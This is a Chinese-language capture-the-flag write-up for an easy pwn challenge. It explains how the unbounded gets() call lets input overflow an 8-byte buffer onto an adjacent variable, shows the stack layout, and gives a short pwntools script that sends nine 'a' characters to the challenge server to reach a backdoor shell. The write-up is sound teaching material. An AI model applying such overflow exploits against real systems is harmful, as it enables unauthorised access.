【PWN】HappyNewYearCTF_2_栈上变量覆写1

题目地址:https://ctf.cssec.cc/games/25/challenges

Author: Sonder

Difficulty: Easy

Category: 栈溢出


gets函数是C语言中的一个函数,用于读取一行文本。这个函数的问题在于,它不会检查输入的长度,所以如果输入的文本超过了目标缓冲区的大小,就会导致栈溢出

这是因为gets函数不知道你为字符串分配了多少内存,它会一直读取输入,直到遇到换行符或EOF。如果输入的数据超过了你分配的内存,gets就会把多余的数据写入其他内存区域,这就可能覆盖其他的变量或者程序的执行代码,导致程序崩溃或者其他未定义的行为

解题

首先checksec,可以看到保护全开,接下来IDA逆向看下。

通过IDA分析,可以发现,当v5=97时,会执行func(sh),我们进一步来看,可以发现实际func(sh)是一个后门函数,可以直接给到shell

接下来,分析一下溢出点,可以看到format是8个字节,但此时是通过gets进行输入,之前文章我们已经介绍过,gets是读取一行字符串到变量中,直到遇到换行停止。

故这里肯定存在溢出。那如何溢出到v5。我们进一步分析栈空间。

复制代码
  High
  Address |                 |
          +-----------------+  <-- rbp + 0x8
          | return address  |  (8字节,函数返回地址)
          +-----------------+  <-- rbp (栈基址寄存器)
          | old rbp         |  (8字节,调用者的栈基址)
          +-----------------+  <-- rbp - 0x8
          | canary value    |  (8字节,栈保护值)
          +-----------------+  <-- rbp - 0x10
          | v5 (__int64)    |  (8字节,局部变量)
          +-----------------+  <-- rbp - 0x18
          | format[8]       |  (8字节,可控的格式化字符串)
  Low     |                 |
  Address

通过栈空间,可以发现,本题中canary实际并无影响,只需通过format溢出到v5即可。

97是a的ASCII码,故我们只需要输入8个字符加一个a即可,在这里我输入9个a,可见下图溢出成功,获取管理权限

exp编写

截止目前,已经可以成功获取flag,但是本着学习的原则。我们仍需进一步编写exp。

py 复制代码
from pwn import *

# 设置日志级别debug,可以打印更多log
context.log_level = 'debug'
HOST = 'challenges.ctf.cssec.cc'
PORT = 32779

r = remote(HOST,PORT)

# 获取输出内容,
r.recvuntil('I will show it.')

exp = 'a'*9
# 发送exp
r.sendline(exp)
# 开始交互
r.interactive()
相关推荐
SkyWalking中文站15 小时前
认识 Horizon UI · 1/17:SkyWalking 新一代可观测性控制台
运维·前端·监控
顺风尿一寸16 小时前
Java Socket 内核之旅:从 SocketChannel.read() 到 tcp_recvmsg 与 epoll 的完整调用链路
linux
雪梨酱QAQ18 小时前
Kubeneters HA Cluster部署
运维
江华森1 天前
Spring Cloud 微服务全栈实战:从 Eureka 到 Docker Compose 一文贯通
运维
江华森1 天前
Matplotlib 数据绘图基础入门
运维
XIAOHEZIcode1 天前
Ubuntu 终端美化全栈指南:Bash 到 Kitty 踩坑实录
linux·ubuntu·命令行
江华森1 天前
NumPy 数值计算基础入门
运维
唐青枫1 天前
别再只会用 cron:Linux systemd Timer 定时任务实战详解
linux
AlfredZhao3 天前
生产环境里,为什么不建议把普通端口直接暴露到公网?
linux·https·443·80
Flynt4 天前
npm v12 来了:allowScripts 默认关闭,我的项目差点跑不起来
安全·npm·node.js